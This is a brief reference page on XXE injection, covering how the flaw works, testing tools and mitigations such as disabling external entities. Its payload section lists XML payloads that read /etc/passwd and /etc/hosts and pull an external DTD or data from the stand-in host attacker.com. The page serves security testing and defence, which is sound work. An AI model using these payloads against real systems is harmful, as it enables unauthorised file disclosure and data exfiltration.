Xxe Injection

Overview

XXE (XML External Entity) Injection is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

XXE attacks can be used to read local files, perform SSRF attacks, cause denial of service, and in some cases achieve remote code execution.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Xxe Injection:

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/data">]><root>&xxe;</root>

<?xml version="1.0"?><!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><svg>&xxe;</svg>

<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/ext.dtd"> %xxe;]>

Tools & Techniques

Recommended tools for Xxe Injection:

• Test in SOAP/XML-RPC APIs, XML file uploads, RSS feeds, SAML assertions
• xxe.sh: automated XXE testing tool
• Burp Suite: Collaborator for out-of-band detection
• Manual SVG upload testing

Prevention & Mitigation

Security recommendations to prevent Xxe Injection:

• Disable external entity processing in XML parsers
• Use less complex data formats like JSON when possible
• Implement proper input validation for XML content
• Apply the principle of least privilege for XML parser configuration
• Regularly update XML parsing libraries

References

Additional resources:

• https://portswigger.net/web-security/xxe
• https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
• https://github.com/enjoiz/XXEinjector